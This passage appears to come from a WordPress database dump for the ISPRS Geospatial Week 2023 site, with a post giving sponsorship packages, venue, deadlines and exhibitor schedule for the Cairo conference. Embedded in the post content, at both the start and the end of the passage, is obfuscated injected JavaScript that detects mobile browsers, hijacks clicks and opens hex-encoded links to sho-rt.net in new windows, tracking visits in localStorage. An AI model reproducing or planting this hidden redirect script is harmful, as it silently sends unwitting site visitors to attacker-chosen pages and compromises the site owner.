_0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2023-03-07 11:38:34','2023-03-07 11:38:34','',3386,'https://gsw2023.com/?p=3930',0,'revision','',0),
(3932,1,'2023-03-23 03:13:04','2023-03-23 03:13:04','','ex','','inherit','open','closed','','ex','','','2023-03-23 03:13:04','2023-03-23 03:13:04','',2920,'https://gsw2023.com/wp-content/uploads/2023/03/ex.jpg',0,'attachment','image/jpeg',0),
(3933,1,'2023-03-23 03:16:38','2023-03-23 03:16:38','','ex','','inherit','open','closed','','ex-2','','','2023-03-23 03:16:38','2023-03-23 03:16:38','',2920,'https://gsw2023.com/wp-content/uploads/2023/03/ex-1.jpg',0,'attachment','image/jpeg',0),
(3934,1,'2023-03-23 03:40:36','2023-03-23 03:40:36','','man','','inherit','open','closed','','man','','','2023-03-23 03:40:36','2023-03-23 03:40:36','',2920,'https://gsw2023.com/wp-content/uploads/2023/03/man.png',0,'attachment','image/png',0),
(3935,1,'2023-03-23 03:41:15','2023-03-23 03:41:15','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">ISPRS GEOSPATIAL WEEK 2023</span></h1>\n<h2 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">SPONSORSHIP AND EXHIBITION ,</span><span style=\"font-size: 18pt;\">Cairo – Egypt 2-7 September 2023</span></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<span style=\"font-size: 10pt;\">The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</span></p>\n<p><span style=\"font-size: 10pt;\">The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series of dedicated workshops. More information regarding ISPRS can be found at: http://www.isprs.org/.</span></p>\n<p><span style=\"font-size: 10pt;\">An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</span></p>\n<p><span style=\"font-size: 10pt;\">A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or Prof. Amr Hanafi at <a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a> or Prof Alaa Abd El Bary <a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a> for more details on the sponsorship opportunities for the GSW/2023.</span></p>\n<p><span style=\"font-size: 10pt;\">We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</span></p>\n<p><span style=\"font-size: 10pt;\">The GSW2023 Organizing Committee.</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><span style=\"font-size: 12pt;\"><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></span></h5>\n<p><span style=\"font-size: 10pt;\">Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El-Sheimy at <a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or Prof. Amr Hanafi at <a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a> or Prof Alaa Abd El Bary <a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a> or <a href=\"https://gsw2023.com/index.html\">info@gsw2023.com</a> .</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3933\" img_size=\"1800x2200\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><span style=\"font-size: 12pt;\"><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></span></h5>\n<p><span style=\"font-size: 10pt;\">(<a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_undefined\">https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_undefined</a>)</span></p>\n<p><span style=\"font-size: 10pt;\">The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3934\" img_size=\"2000x2000\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><span style=\"font-size: 10pt;\">Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</span></p>\n<ul>\n<li><span style=\"font-size: 10pt;\">May 1, 2023 Deadline for sponsorship confirmation and payment</span></li>\n<li><span style=\"font-size: 10pt;\">June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</span></li>\n</ul>\n<p><span style=\"font-size: 10pt;\"><strong> </strong></span><span style=\"font-size: 10pt;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Heliopolis Campus</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Re: ISPRS GSW’2023</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>ATT: Prof. Alla Abdelbary</strong></span></p>\n<p><span style=\"font-size: 10pt;\">P.O. Box 2033 -Elhorria El Moshir Ismail st.-behind Sheraton Bldg. </span></p>\n<p><span style=\"font-size: 10pt;\">(+202) 22685616 - 22685615 </span></p>\n<p><span style=\"font-size: 10pt;\">(+202) 22685892</span></p>\n<p>&nbsp;</p>\n<h1><span style=\"font-size: 12pt;\">CONFERENCE PROGRAM FOR EXHIBITORS</span></h1>\n<p>&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 2</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\"><strong>9:00 – 5:00</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong> </strong></span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\"><strong>Tutorial Day</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Exhibition Setup</strong></span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 3</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">12:00-17:00</span></p>\n<p><span style=\"font-size: 10pt;\">18:00 – 20:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition Opening</span></p>\n<p><span style=\"font-size: 10pt;\">Welcome Reception</span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 4</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">9:00 – 17:00</span></p>\n<p><span style=\"font-size: 10pt;\">18:00 – 20:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition</span></p>\n<p><span style=\"font-size: 10pt;\">Exhibitors’ reception</span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 5</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">9:00 – 15:00</span></p>\n<p><span style=\"font-size: 10pt;\">15:00 – 18:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition</span></p>\n<p><span style=\"font-size: 10pt;\">Dismantle Exhibition</span></td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 10pt;\">The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</span></p>\n<p>&nbsp;</p>\n<h1><span style=\"font-size: 12pt;\">INFORMATION</span></h1>\n<p><span style=\"font-size: 10pt;\">For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact the organizing committee by mail (<a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or <a href=\"https://gsw2023.com/index.html\">info@gsw2023.com</a> ).</span>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 